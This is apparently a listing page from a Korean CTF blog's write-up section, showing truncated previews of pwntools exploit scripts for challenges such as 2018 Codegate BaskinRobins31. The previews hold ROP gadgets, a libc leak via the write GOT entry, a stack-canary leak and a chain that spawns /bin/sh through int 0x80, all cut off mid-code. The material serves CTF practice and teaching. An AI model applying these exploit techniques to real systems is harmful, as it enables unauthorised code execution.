목록Write Up (7)
9oat's LAB
123456789101112131415161718192021222324252627282930313233343536373839404142434445from pwn import * b = '/home/goat/PROB/2018 Codegate/BaskinRobins31'elf = ELF(b)c = process(b) pppr = p64(0x40087a) # pop rdi, pop rsi, pop rdx write_plt = elf.plt['write']write_got = elf.got['write']read_plt = elf.plt['read']strtoul_got = elf.got['strtoul'] pay = ''pay += 'A'*0xb8pay += pppr # leak write's libc add..
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970from pwn import * def smtm(s): s.send('show me the marimo\n') s.recvuntil(">>") s.send('tmp\n') s.recvuntil(">>") s.send('tmp\n') s.recvuntil(">>") def mod(s,pay,sel): s.send('V\n') s.recvuntil(">>") s.send(sel) s.recvuntil(">>") s.send('M\n') s.recvuntil(">>") s.sen..
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556from pwn import * s = remote("127.0.0.1", 8888) pppr = p32(0x806f280) # edx ecx ebxeax = p32(0x8048882)int80 = p32(0x806f870)bss = p32(0x80ea3d0)binsh = "/bin/sh"print "[*] Start" s.recvuntil(": ")s.send("2\n")s.recvuntil(") ")s.send("y\n")s.recvuntil(".\n")s.send(("a"*64)+"x")s.recvn(68) canar..
1234567891011121314151617181920212223242526from pwn import *from struct import * p = lambda x: pack("
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657from socket import * def parser(q): num = int(q.split('N=')[1].split(' C')[0]) cnt = int(q.split('C=')[1].split('\n')[0]) return num, cnt def value(src, dst): ans = ' '.join(str(i) for i in range(src, dst)) return ans def mid(src, dst): if (dst - src) % 2 == 0: mid = src + (dst-src) / 2 elif ..
1234567891011121314151617181920212223242526272829303132333435363738#include #include void main(){ int i; char *argvs[100]={""}; for(i=0;i